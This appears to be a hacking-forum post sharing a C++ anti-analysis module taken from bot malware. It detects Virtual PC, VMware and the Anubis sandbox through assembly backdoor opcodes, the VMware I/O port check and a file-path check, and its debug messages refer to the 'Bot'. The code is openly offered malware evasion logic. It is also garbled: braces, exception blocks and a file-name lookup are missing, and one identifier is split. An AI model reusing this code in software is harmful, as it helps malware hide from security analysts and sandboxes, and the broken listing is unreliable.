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Locked Anti-VMWare [C++]


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#include "../Headers/includes.h"
#include "../Headers/functions.h"

#ifndef NO_ANTIVM

DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep)
PCONTEXT ctx = ep->ContextRecord;
ctx->Ebx = -1; // Not running VPC
ctx->Eip += 4; // skip past the "call VPC" opcodes

bool DetectVPC()
bool bVPCIsPresent = FALSE;

_asm push ebx
_asm mov ebx, 0 // It will stay ZERO if VPC is running
_asm mov eax, 1 // VPC function number
_asm __emit 0Fh
_asm __emit 3Fh
_asm __emit 07h
_asm __emit 0Bh
_asm test ebx, ebx
_asm setz [bVPCIsPresent]
_asm pop ebx

__except(IsInsideVPC_exceptionFilter(GetExceptionI nformation()))

#ifdef DEBUG
if (bVPCIsPresent==TRUE)
DebugMsg("Bot is under VPC !");
DebugMsg("Bot is not running under VPC !");

return bVPCIsPresent;

bool DetectVMWare()
bool bVMWareIsPresent = TRUE;
push edx
push ecx
push ebx

mov eax, 'VMXh'
mov ebx, 0 // any value but not the MAGIC VALUE
mov ecx, 10 // get VMWare version
mov edx, 'VX' // port number

in eax, dx // read port
// on return EAX returns the VERSION
cmp ebx, 'VMXh' // is it a reply from VMWare?
setz [bVMWareIsPresent] // set return value

pop ebx
pop ecx
pop edx
bVMWareIsPresent = FALSE;

#ifdef DEBUG
if (bVMWareIsPresent==TRUE)
DebugMsg("Bot is under VMWare !");
DebugMsg("Bot is not running under VMWare !");

return bVMWareIsPresent;

bool DetectAnubis()
char szBotFile[MAX_PATH];
bool bAnubisIsPresent = FALSE;

if (strstr(szBotFile, "C:\\InsideTm\\"))
bAnubisIsPresent = TRUE;

#ifdef DEBUG
if (bAnubisIsPresent==TRUE)
DebugMsg("Bot is running under Anubis !");
DebugMsg("Bot is not running under Anubis !");

return bAnubisIsPresent;

bool IsProcessRunningUnderVM()
bool bVMWare;
bool bVPC;
bool bAnubis;

bVMWare = DetectVMWare();
bVPC = DetectVPC();
bAnubis = DetectAnubis();

if (bVPC==TRUE || bVMWare==TRUE || bAnubis==TRUE)
return TRUE;

return FALSE;
This is the hidden content, please


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